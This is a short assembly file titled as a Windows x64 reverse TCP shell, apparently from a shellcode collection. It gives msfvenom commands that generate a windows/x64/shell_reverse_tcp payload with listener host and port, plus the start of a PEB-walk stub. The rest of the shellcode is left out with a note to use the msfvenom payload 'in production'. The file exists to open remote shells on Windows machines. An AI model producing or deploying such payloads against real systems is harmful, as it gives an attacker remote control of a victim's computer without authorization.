; Title:    Windows x64 reverse TCP shell (WinSock2)
; Platform: windows
; Arch:     x64
; Size:     ~300 bytes
; Encoding: raw
;
; Assembled hex:
; ; Generated by msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw | xxd

BITS 64
global _start

_start:
    BITS    64
    ; Windows x64 reverse shell via WinSock
    ; Uses PEB walk to find kernel32.dll, then GetProcAddress
    ; Full shellcode is ~300 bytes — generate with msfvenom for production:
    ; msfvenom -p windows/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f raw
    ;
    ; PEB walk stub:
    xor     rcx, rcx
    mov     rax, [gs:rcx+0x60]   ; PEB
    mov     rax, [rax+0x18]      ; PEB->Ldr
    mov     rax, [rax+0x20]      ; InMemoryOrderModuleList
    ; Walk list to find kernel32.dll...
    ; [full shellcode abbreviated — use msfvenom payload in production]
